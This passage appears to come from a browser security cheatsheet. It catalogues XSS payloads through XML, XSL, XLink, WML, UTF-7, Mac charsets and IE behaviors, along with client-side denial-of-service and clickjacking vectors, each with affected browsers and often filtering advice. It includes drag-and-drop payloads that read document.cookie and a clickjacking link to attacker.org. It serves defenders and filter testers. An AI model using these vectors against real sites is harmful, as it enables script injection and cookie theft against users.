                                                                              <?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>

                                                                              <!ENTITY x "&#x3C;html:img&#x20;src='x'&#x20;xmlns:html='http://www.w3.org/1999/xhtml'&#x20;onerror='alert(1)'/&#x3E;">crossdomain: 1path: http://html5sec.org/test.dtdname: test.dtd
                                                                                • Internet Explorer 6.0
                                                                                • Internet Explorer Latest (In Older Docmodes)
                                                                              • xss
                                                                              • javascript
                                                                              • internet explorer
                                                                              • xml
                                                                              • dtd
                                                                              • arbitrary
                                                                              LeverOne

                                                                              XML JavaScript execution via style attribute in IE#77test

                                                                              IE supports the style attribute in xml-pages too. Thus JavaScript can be executed via expression() with any given tag. The example works up to IE 7 standards mode.

                                                                              <?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>

                                                                                • Internet Explorer 6.0
                                                                                • Internet Explorer 10.0
                                                                              • xss
                                                                              • javascript
                                                                              • internet explorer
                                                                              • xml
                                                                              • css
                                                                              • style
                                                                                LeverOne

                                                                                Arbitrary payload injection via XSL + XDR-schema in IE#78test

                                                                                The namespace "html" is automatically determined using XSL. Missing attributes for the <img> tag such as "onerror" are obtained from the XDR-schema - and will then execute JavaScript. The example works up to IE 8 standards mode.

                                                                                <?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>

                                                                                <?xml version="1.0"?> <Schema name="x" xmlns="urn:schemas-microsoft-com:xml-data"> <ElementType name="img"> <AttributeType name="src" required="yes" default="x"/> <AttributeType name="onerror" required="yes" default="alert(1)"/> <attribute type="src"/> <attribute type="onerror"/> </ElementType> </Schema>crossdomain: 1path: http://html5sec.org/test.xdrname: test.xdr
                                                                                  • Internet Explorer 6.0
                                                                                  • Internet Explorer Latest (In Older Docmodes)
                                                                                • xss
                                                                                • javascript
                                                                                • internet explorer
                                                                                • xml
                                                                                • xdr
                                                                                • arbitrary
                                                                                • xml data reduced
                                                                                • xsl
                                                                                LeverOne

                                                                                Active JavaScript execution via XLink#81test

                                                                                FF supports the "xlink:actuate" attribute and allows displaying XML link without additional styles. The default namespace here is "html".

                                                                                <x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>

                                                                                  • Firefox 3.0
                                                                                  • Firefox 3.6.28
                                                                                • xss
                                                                                • javascript
                                                                                • xlink
                                                                                • firefox
                                                                                • xml
                                                                                LeverOne, .mario

                                                                                JavaScript execution via XML stylesheet, data URI and expression()#82test

                                                                                Internet Explorer 8 to 10 support data URIs and thus are capable of including stylesheets this way. By using a xml stylesheet tag and a data URI containing an expression() it's possible to execute JavaScript without user interaction.

                                                                                <?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>

                                                                                  • Internet Explorer 8.0
                                                                                  • Internet Explorer 10.0
                                                                                • xss
                                                                                • javascript
                                                                                • xml stylesheet
                                                                                • css
                                                                                • internet explorer
                                                                                • expression
                                                                                • xml
                                                                                .mario

                                                                                Obfuscated WML injection via undeclared WAP-ML Variables#83test

                                                                                The example demonstrates the use in WML undeclared variables (are ignored). These variables can be declared in the tags <setvar>, <input>, <select>. Namespace indicated for use inside the XML-file. Also inside WML-files can you use a lot of regular HTML-tags.

                                                                                <x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>

                                                                                  • Opera 9.X
                                                                                  • Opera 12.0
                                                                                • xss
                                                                                • javascript
                                                                                • wml
                                                                                • opera
                                                                                • mobile
                                                                                • timer
                                                                                • variable
                                                                                LeverOne, .mario

                                                                                Opera JavaScript execution via XML-events handler#84test

                                                                                The browser tries to load an external XML-event handler and execute JavaScript without user interaction. The problem seems to be fixed in Opera 11.

                                                                                <x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>

                                                                                  • Opera 9.X
                                                                                  • Opera 11.01
                                                                                • xss
                                                                                • javascript
                                                                                • opera
                                                                                • event
                                                                                • handler
                                                                                LeverOne

                                                                                Arbitrary payload injection in Opera via XML-events handler#85test

                                                                                The browser loads an external xml-event handler, which contains the JavaScript code. This example also works with data URIs.

                                                                                <x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>

                                                                                <script xmlns="http://www.w3.org/1999/xhtml" id="x">alert(1)</script>crossdomain: 1path: http://html5sec.org/test.evtname: test.evt
                                                                                  • Opera 9.X
                                                                                  • Opera 12.0
                                                                                • xss
                                                                                • javascript
                                                                                • opera
                                                                                • event
                                                                                • handler
                                                                                • arbitrary
                                                                                LeverOne

                                                                                Executing JavaScript with WD-XSL, <eval> elements and "expr" attributes#135test

                                                                                Internet Explorer, when loading an XML document in an older document mode, allows the use of a legacy XSL version called WD-XSL. This version, shipped with several proprietary extras, allows execution of JavaScript and other script code in very uncommon ways. The browser for instance supports an <eval> element and "expr" attributes that can directly be fed with script code or references to existing JavaScript and XMLDOM methods. Other than MSXSL script, direct DOM access is possible with the use of WD-XSL.

                                                                                <?xml-stylesheet type="text/xsl" href="#" ?> <stylesheet xmlns="http://www.w3.org/TR/WD-xsl"> <template match="/"> <eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(1)</eval> <if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if> </template> </stylesheet>

                                                                                Websites rendered in XML- or XML-like MIME types should not allow untrusted input without heavy filtering. Unknown elements can cause unexpected script execution depending on browser and render mode. The use of custom namespaces in user generated input should be prohibited.

                                                                                  • Internet Explorer 5.5
                                                                                  • Internet Explorer Latest (In Older Docmodes)
                                                                                • xss
                                                                                • xslt
                                                                                • internet explorer
                                                                                • xml
                                                                                • wdxsl
                                                                                • legacy
                                                                                .mario
                                                                              • UTF7 and other exotic charset based vectors

                                                                                XSS via x-imap4-modified-utf7 (1)#2test

                                                                                This vector shows how UTF7 derivations can be used to generate very hard to detect XSS vectors in exotic charsets

                                                                                <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi

                                                                                Make sure no <META> tags can be injected and the website is delivered with a charset.

                                                                                  • Firefox 2.X
                                                                                  • Firefox 3.6.28
                                                                                • xss
                                                                                • utf7
                                                                                • firefox
                                                                                • charset
                                                                                  .mario

                                                                                  XSS via x-imap4-modified-utf7 (2)#3test

                                                                                  This vector shows how UTF7 derivations can be used to generate very hard to detect XSS vectors in exotic charsets

                                                                                  <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>

                                                                                  Make sure no <META> tags can be injected and the website is delivered with a charset.

                                                                                    • Firefox 2.X
                                                                                    • Firefox 3.6.28
                                                                                  • xss
                                                                                  • utf7
                                                                                  • firefox
                                                                                  • charset
                                                                                    .mario

                                                                                    XSS via &#188 and &#190 in MacFarsi, MacArabic and MacHebrew#19test

                                                                                    Buggy charset implementations in Firefox allow to craft HTML structures without using the usual characters such as < and >. Most affected charsets are from the Mac charset family - such as mac-farsi, mac-arabic and mac-hebrew.

                                                                                    <meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾

                                                                                    User input should never allow <META> tags to avoid re-setting the charset. In case the website is encoded in one of the affected charsets make sure to have your filter be aware that for Firefox &#60; (<) and &#188; are equivalent - as well as other characters too.

                                                                                      • Firefox 2.X
                                                                                      • Firefox 3.6.28
                                                                                    • x-mac-arabic
                                                                                    • x-mac-farsi
                                                                                    • x-mac-hebrew
                                                                                    • firefox
                                                                                    • charset
                                                                                    hasegawayosuke
                                                                                  • Client side denial of service vectors

                                                                                    Client-side denial of service via repeat templates#13test

                                                                                    This vector uses the repeat template syntax specifies in the WebForms 2.0 draft. By using nested tags repeating themselves all over again the client can be forced to deny service or even crash.

                                                                                    <x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>

                                                                                    Avoid allowing users submitting HTML containing repeat or "repeat-start"/"repeat-end" attributes. If necessary validate the numerical values used for them to be reasonably small.

                                                                                      • Opera 10.0
                                                                                      • Opera 10.10
                                                                                    • dos
                                                                                    • repeat
                                                                                    • template
                                                                                    • webforms
                                                                                    • opera
                                                                                    • proprietary
                                                                                    .mario

                                                                                    Client-side denial of service via faulty regular expressions#14test

                                                                                    Opera 10 allows client side validation via the pattern attribute. In case the pattern value is a badly written regex the client can be "dossed" with short customized character sequences.

                                                                                    <input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>

                                                                                    Don't allow users to submit HTML containing "pattern" attributes and make sure your own client side regular expressions used for validation are well written and not vulnerable against easy ReDoS attacks.

                                                                                      • Opera 10.0
                                                                                      • Firefox 12.0
                                                                                      • Firefox Latest
                                                                                    • dos
                                                                                    • pattern
                                                                                    • regex
                                                                                    • html5
                                                                                    • validation
                                                                                    • opera
                                                                                    • proprietary
                                                                                    .mario

                                                                                    Input stealing/form DoS with onblur=focus() and autofocus#22test

                                                                                    This very basic vector demonstrates how the combination of "autofocus" and "onblur" can render any other form on the targeted website useless.

                                                                                    <input onblur=focus() autofocus><input>

                                                                                    User submitted markup should not contain "autofocus" attributes.

                                                                                      • Opera 9.0
                                                                                      • Opera Latest
                                                                                      • Chrome 3.0
                                                                                      • Chrome Latest
                                                                                      • Safari 5.0
                                                                                      • Safari Latest
                                                                                    • dos
                                                                                    • javascript
                                                                                    • opera
                                                                                    • chrome
                                                                                    • safari
                                                                                    • autofocus
                                                                                    • onblur
                                                                                    • html5
                                                                                    Skyphire, Gareth, .mario
                                                                                  • HTML behavior and binding vectors

                                                                                    Using onbegin and HTML+TIME to execute JavaScript#16test

                                                                                    The HTML+TIME behavior allows to use arbitrary tags to execute JavaScript via onbegin event handlers.

                                                                                    X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >

                                                                                    Don't allow behavior properties in user submitted CSS and markup and don't rely on blacklists regarding dangerous HTML tags. The rather unknown HTML+TIME API provides too many ways to execute JavaScript with and without user interaction on exotic ways. Avoid blacklists if possible.

                                                                                      • Internet Explorer 5.5
                                                                                      • Internet Explorer 8.0
                                                                                    • xss
                                                                                    • javascript
                                                                                    • ie
                                                                                    • behavior
                                                                                    • html+time
                                                                                    • onbegin
                                                                                    .mario

                                                                                    JavaScript execution via HTML+TIME without user interaction (1)#24test

                                                                                    This obfuscated vector uses HTML+TIME to execute JavaScript without user interaction - and without suspicious event handlers but just "attributename" and "to" attributes.

                                                                                    1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(1)&gt;`>

                                                                                    Don't allow behavior properties in user submitted CSS and markup and don't rely on blacklists regarding dangerous HTML tags. The rather unknown HTML+TIME API provides too many ways to execute JavaScript with and without user interaction on exotic ways. Avoid blacklists if possible.

                                                                                      • Internet Explorer 5.5
                                                                                      • Internet Explorer 8.0
                                                                                    • xss
                                                                                    • javascript
                                                                                    • ie
                                                                                    • behavior
                                                                                    • html+time
                                                                                    • attributename
                                                                                    • to
                                                                                    • proprietary
                                                                                    .mario

                                                                                    JavaScript execution via HTML+TIME without user interaction (2)#28test

                                                                                    This HTML+TIME vector utilized the attributes "attributename" and "values" to map encoded markup into an attribute to execute JavaScript.

                                                                                    1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(1)&gt;>

                                                                                    As soon as the HTML+TIME namespace and the behavior property are mapped to a HTML element a whole range of new attributes to execute JavaScript is available. In user submitted html "xmlns" attributes should not be allowed - as well as "behavior" properties for style tags and attribtes. Don't rely on blacklisting when dealing with user submitted markup.

                                                                                      • Internet Explorer 5.5
                                                                                      • Internet Explorer 8.0
                                                                                    • xss
                                                                                    • javascript
                                                                                    • internet explorer
                                                                                    • behavior
                                                                                    • style
                                                                                    • html+time
                                                                                    • attributename
                                                                                    • values
                                                                                    • proprietary
                                                                                    LeverOne

                                                                                    VML frame with embedded VML object plus onmouseover#34test

                                                                                    A VML frame object works by giving the VML frame a "src" attribute and have it point to another VML object. A VML frame object in quirks mode can enclose a VML rect object or regular HTML which is responding to mouseover events.

                                                                                    1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>

                                                                                    Don't allow behavior properties in user submitted CSS and markup and don't rely on blacklists regarding dangerous HTML tags.

                                                                                    <xml> <rect style="height:100%;width:100%" id="xss" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>crossdomain: 1name: test.vml
                                                                                      • Internet Explorer 5.5
                                                                                      • Internet Explorer Latest (In Older Docmode)
                                                                                    • xss
                                                                                    • javascript
                                                                                    • style
                                                                                    • behavior
                                                                                    • vml
                                                                                    • internet explorer
                                                                                    • proprietary
                                                                                    http://www.malware.com

                                                                                    VML line object utilizing href attribute with JavaScript URI#35test

                                                                                    The vector paints a very thick and wide line responding to clicks with JavaScript execution via JavaScript URI. Note that the actual URI is being masked in the status bar. During an overlay attack the victim will not know about the payload via status bar.

                                                                                    1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>

                                                                                    Don't allow behavior properties in user submitted CSS and markup and don't rely on blacklists regarding dangerous HTML tags.

                                                                                      • Internet Explorer 5.5
                                                                                      • Internet Explorer Latest (In Older Docmode)
                                                                                    • xss
                                                                                    • javascript
                                                                                    • style
                                                                                    • behavior
                                                                                    • vml
                                                                                    • internet explorer
                                                                                    • proprietary
                                                                                    LeverOne

                                                                                    AnchorClick behavior enabling folder attribute as href replacement#36test

                                                                                    Using the AnchorClick behavior allows to use the "folder" attribute as replacement for a "href" attribute on <A> elements. This example works up to IE 8 standards mode.

                                                                                    <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>

                                                                                    Don't allow behavior properties in user submitted CSS and markup and don't rely on blacklists regarding dangerous HTML tags.

                                                                                      • Internet Explorer 5.5
                                                                                      • Internet Explorer Latest (In Older Docmode)
                                                                                    • xss
                                                                                    • javascript
                                                                                    • style
                                                                                    • behavior
                                                                                    • anchorclick
                                                                                    • internet explorer
                                                                                    • proprietary
                                                                                    .mario

                                                                                    Internet Explorer Scriptlets executing JavaScript#52test

                                                                                    Internet Explorer supports Scriptlets as an alternative binding method for Data Islands. By using the shown examples JavaScript will execute without user interaction.

                                                                                    <x style="behavior:url(test.sct)">

                                                                                    Users should not be able to either submit CSS or HTML containing style attributes. If necessary make sure the "behavior" property is not whitelisted.

                                                                                    <SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS> <SCRIPT Language="javascript">alert(1)</SCRIPT> </SCRIPTLET>crossdomain: 0name: test.sct
                                                                                      • Internet Explorer 5.5
                                                                                      • Internet Explorer Latest (In Older Docmodes)
                                                                                    • xss
                                                                                    • javascript
                                                                                    • behavior
                                                                                    • scriptlet
                                                                                    • internet explorer
                                                                                    • style
                                                                                    • css
                                                                                    • sct
                                                                                    .mario

                                                                                    Internet Explorer Data Islands executing JavaScript#53test

                                                                                    Internet Explorer supports Data Islands as an XMLish binding method. By using the shown examples JavaScript will execute without user interaction.

                                                                                    <xml id="xss" src="test.htc"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>

                                                                                    Users should not be able to submit HTML containing <XML> tags. If necessary make sure the "dataformatas" and "datasrc" attributes are not whitelisted.

                                                                                    <?xml version="1.0"?> <x> <payload><![CDATA[<img src=x onerror=alert(1)>]]></payload> </x>crossdomain: 0path: http://html5sec.org/test.htcname: test.htc
                                                                                      • Internet Explorer 5.5
                                                                                      • Internet Explorer Latest (In Older Docmodes)
                                                                                    • xss
                                                                                    • javascript
                                                                                    • behavior
                                                                                    • internet explorer
                                                                                    • style
                                                                                    • css
                                                                                    • data island
                                                                                    .mario

                                                                                    Server-sent events - Opera and <EVENT-SOURCE> tags (1)#73test

                                                                                    Opera allows using <EVENT-SOURCE> elements. In case the "src" attribute points to a valid cross domain source it's possible to have the element listen for events and the containing data.

                                                                                    <event-source src="event.php" onload="alert(1)">

                                                                                    Make sure users cannot influence the source of <EVENT-SOURCE> elements and don't whitelist the tag itself inside user submitted markup.

                                                                                    <?php header("Content-Type: application/x-dom-event-stream"); die("Event: load\ndata: \n\n"); ?>crossdomain: 1path: http://html5sec.org/event.phpname: event.php
                                                                                      • Opera 8.X
                                                                                      • Opera 10.63
                                                                                    • xss
                                                                                    • javascript
                                                                                    • event-source
                                                                                    • opera
                                                                                    • sse
                                                                                    .mario

                                                                                    Server-sent events - Opera and <EVENT-SOURCE> tags (2)#74test

                                                                                    Opera allows using <EVENT-SOURCE> tags to receive server-sent events. In this example a data URI is being used as an event source triggering a click on another HTML element. In an attack scenario an XSS requiring user interaction can be turned into an active script execution this way.

                                                                                    <a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>

                                                                                    Make sure users cannot influence the source of <EVENT-SOURCE> elements and don't whitelist the tag itself inside user submitted markup.

                                                                                      • Opera 8.X
                                                                                      • Opera 10.63
                                                                                    • xss
                                                                                    • javascript
                                                                                    • event-source
                                                                                    • opera
                                                                                    • sse
                                                                                    .mario

                                                                                    Internet Explorer applying behavior via <import namespace>#116test

                                                                                    Internet Explorer allows to apply namespaces and attach behaviors not only by using CSS but <import> or <?import> tags. The example shows how to work with HTML+TIME behaviors without using style attributes or tags and cause script execution via the to attribute. If there is no attribute "targetElement", will be overridden "innerHTML" property of the <body> tag. To limit the area that be changed, you can use the attribute "targetElement". This syntax is also supported in IE9 for non-obsolete behaviors.

                                                                                    <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(1)&gt;">

                                                                                      • Internet Explorer 6.0
                                                                                      • Internet Explorer 8.0
                                                                                    • xss
                                                                                    • behavior
                                                                                    • import
                                                                                    • xml
                                                                                    • namespace
                                                                                    • time
                                                                                    • entities
                                                                                    LeverOne, GreyMagic
                                                                                  • Clickjacking and UI Redressing vectors

                                                                                    Reverse clickjacking via <IFRAME>#117test

                                                                                    Internet Explorer allows to place <IFRAME> tags inside <A> tags. By clicking on a not clickable element inside the IFRAME there will be executed the URL defined in the "href" attribute of the <A> tag.

                                                                                    <a href="http://attacker.org"> <iframe src="http://example.org/"></iframe> </a>

                                                                                      • Internet Explorer 8.0
                                                                                      • Internet Explorer 9.0
                                                                                    • clickjacking
                                                                                    • internet explorer
                                                                                    • iframe
                                                                                    mniemietz

                                                                                    Text injection by drag-and-drop#118test

                                                                                    The method "setData" allows, with the event handler "ondragstart" and the attribute "draggable" with the value "true", to drag the text "malicious code" and not "Drop me" into the IFRAME. This IFRAME can consist of a web page with an input field to drop in data. Note that cross-origin drag&drop has meanwhile been heavily restricted in power due to security risks.

                                                                                    <div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1> </div> <iframe src="http://www.example.org/dropHere.html"></iframe>

                                                                                      • Opera 12.0
                                                                                      • Firefox 3.X
                                                                                      • Firefox 15.0
                                                                                      • Safari 5.0
                                                                                      • Safari 5.1.7
                                                                                    • clickjacking
                                                                                    • firefox
                                                                                    • drag-and-drop
                                                                                    • setData
                                                                                    • ondragstart
                                                                                    • draggable
                                                                                    mniemietz

                                                                                    Content extraction via view-source#119test

                                                                                    To show the source code of a web page inside the web browser Mozilla Firefox or Google Chrome, "view-source:" can be used as a prefix for the URL. Firefox - and that is essential for this vector - allows iframes to show view-source: URLs. With the combination of a "textarea" tag, just two drags to perform this attack are needed, as in the case of elements like images. The first drag is to select an element and the second to drag an element out of the iframe into the text area. This method also bypasses CSS and JS based clickjacking protection.

                                                                                    <iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe> <textarea type="text" cols="50" rows="10"></textarea>

                                                                                      • Firefox 2.X
                                                                                      • Firefox 13.0
                                                                                    • clickjacking
                                                                                    • firefox
                                                                                    • content extraction
                                                                                    • view-source
                                                                                    mniemietz

                                                                                    Pop-up blocker bypass#120test

                                                                                    A web browser like Firefox distinguishes between trusted and not trusted events, depending on the situation. User interactions like a click will be trusted for the reason that they are made explicitly by the user. If a web page initiates an event like opening a pop-up window automatically, the event is not trusted and therefore blocked. Tests have shown that other browsers like Google Chrome or Opera behave similarly. With the use of clickjacking techniques, an attacker can get its victim to create a trusted event by clicking on a link that opens one or more pop-up windows. Thus, an attacker can get the victim to unknowingly trigger a trusted event by doing a click. This event can be recycled by an attacker for later usage or directly used to e.g. generate pop-up windows that the user does not desire.

                                                                                    <script> function makePopups(){ for (i=1;i<6;i++) { window.open('popup.html','spam'+i,'width=50,height=50'); } } </script> <body> <a href="#" onclick="makePopups()">Spam</a>

                                                                                      • Internet Explorer 5.0
                                                                                      • Internet Explorer 9.0
                                                                                      • Firefox 2.X
                                                                                      • Firefox Latest
                                                                                      • Chrome 6.0
                                                                                      • Chrome 23.0
                                                                                      • Safari 5.0
                                                                                      • Safari 5.1.7
                                                                                    • clickjacking
                                                                                    • internet explorer
                                                                                    • opera
                                                                                    • firefox
                                                                                    • chrome
                                                                                    • safari
                                                                                    • pop-up
                                                                                    mniemietz

                                                                                    SVG masking#121test

                                                                                    Masking elements can greatly simplify a clickjacking attack. Here, a "body" tag with the "style" attribute "background:gray" is given. As the name suggests, the background of the web page will have the color gray. The "iframe" tag holds the attributes "src" and "style". The URL of the target web page is the value of the "src" attribute. Inside the "style" attribute there is information to the width, the height, and the border of the web page. Finally, there is the property "mask" with "url(#maskForClickjacking)". This "url" points to an SVG with the "id" value "maskForClickjacking". On the next line, an "svg" tag with the namespace "svg" is defined. After that, a "mask" tag with the attributes "id", "maskUnits" and "maskContentUnits" is inside the "svg" tag. The attribute "id" holds the value "maskForClickjacking", which is exactly the value inside the "url". The attribute "maskUnits" defines the coordinate system for the data of "x", "y", "width" and "height". The second attribute "maskContentUnits" defines the coordinate system for the contents of the "mask" with "objectBoundingBox". Inside the "mask" tag, there are two tags called "rect" and "circle". Each tag holds information to the position and is determined by the geometric shape the width and height or radius. The attribute "fill", with the value "white", ensures that the viewing whole in the mask is visible.

                                                                                    <html xmlns="http://www.w3.org/1999/xhtml" xmlns:svg="http://www.w3.org/2000/svg"> <body style="background:gray"> <iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/> <svg:svg> <svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"> <svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/> <svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/> </svg:mask> </svg:svg> </body> </html>

                                                                                      • Firefox 3.X
                                                                                      • Firefox Latest
                                                                                    • clickjacking
                                                                                    • firefox
                                                                                    • svg
                                                                                    • masking
                                                                                    mniemietz

                                                                                    Sandboxed Iframes#122test

                                                                                    Google Chrome implements the HTML5 "sandboxed iframes". This particular example shows on how to turn this feature against websites only using JavaScript based frame-busters. Note that the framed website can still execute JavaScript - but has no privileges to modify the top frame's location. This would only be possible if the sandbox attribute also came with the "allow-top-navigation" parameter.

                                                                                    <iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>

                                                                                      • Chrome 8.0
                                                                                      • Chrome Latest
                                                                                      • Internet Explorer 10.0
                                                                                      • Internet Explorer Latest
                                                                                      • Safari 5.1.7
                                                                                      • Safari Latest
                                                                                      • Opera 15.0
                                                                                      • Opera Latest
                                                                                    • clickjacking
                                                                                    • chrome
                                                                                    • iframe
                                                                                    • sandbox
                                                                                    kkotowicz

                                                                                    Classjacking with jQuery#123test

                                                                                    CSS offers the attribute "class" as a selector to style a group of HTML elements. Consequently, it is feasible to style e.g. "span" and "a" tags. Here, the "span" tag has the value "foo" and the "a" tag the value "bar" inside the "class" attribute. This values can be used to define the font size or other CSS-specific properties. The first "script" tag holds an "src" attribute with the value "http://code.jquery.com/jquery-1.4.4.js". It is a reference to a file of the "jQuery JavaScript Library v1.4.4". The name "jQuery" stands for a JavaScript Library that simplifies HTML document traversing, event handling, animating, and Ajax interactions. So it is ideally suited to deal with user interactions and to manipulate them, as required for complex UI redressing attacks. Thus, "jQuery" is given in the second "script" tag. At first, the "span" tag is selected, which holds the value "foo" in the "class" attribute. After that, ".click" is implemented. It can be used to bind an event handler to the "click" JavaScript event, or to trigger that event on an element. In this case, an alert window will be executed with the text "foo" after clicking on the "Some text" value of the "span" tag. After closing the alert window, a click event is triggered on the "a" tag with the value "bar" inside the "class" attribute. Analogue to the first event, an alert window appears with the text "bar". After closing the alert window, the web browser will redirect the web page to "http://html5sec.org". If there is a click on the link "http://www.example.org" and not on the text "Some text", an alert window is displayed with the text "bar" followed by a redirection to "http://example.org" and not "http://html5sec.org". This behaviour follows from the "href" attribute.

                                                                                    <span class=foo>Some text</span> <a class=bar href="http://www.example.org">www.example.org</a> <script src="http://code.jquery.com/jquery-1.4.4.js"></script> <script> $("span.foo").click(function() { alert('foo'); $("a.bar").click(); }); $("a.bar").click(function() { alert('bar'); location="http://html5sec.org"; }); </script>

                                                                                      • Internet Explorer Latest
                                                                                      • Opera 10.X
                                                                                      • Opera Latest
                                                                                      • Firefox 2.X
                                                                                      • Firefox Latest
                                                                                      • Chrome 8.0
                                                                                      • Chrome Latest
                                                                                      • Safari 5.0
                                                                                      • Safari Latest
                                                                                    • clickjacking
                                                                                    • classjacking
                                                                                    • jQuery
                                                                                    • class
                                                                                    mniemietz

                                                                                    Passive XSS via Drag&Drop of specially crafted URIs#131test

                                                                                    It is possible to bypass Mozilla Firefox (tested on version 8.x and 9.x) internal protection and execute JavaScript Drag and Drop by using capitalization and Feed protocol, and to run that JavaScript on the top page if you can include the malicious page in an IFrame. The "event.preventDefault()" method in "ondragover" event of the element is to block the natural function of the browser. Usually the malicious IFrame should deceive the user to drag and drop a JS to the drop box which can be concealed in a hidden "Textarea" element.

                                                                                    <b>drag and drop one of the following strings to the drop box:</b> <br/><hr/> jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// <br/><hr/> feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// <br/><hr/> feed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&#x3c;/script>&#x3c;b> <br/><hr/> feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// <br/><hr/> <div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>

                                                                                      • Firefox 6
                                                                                      • Firefox 10.0.2
                                                                                    • drag&drop
                                                                                    • html5
                                                                                    • iframe
                                                                                    • feed
                                                                                    • firefox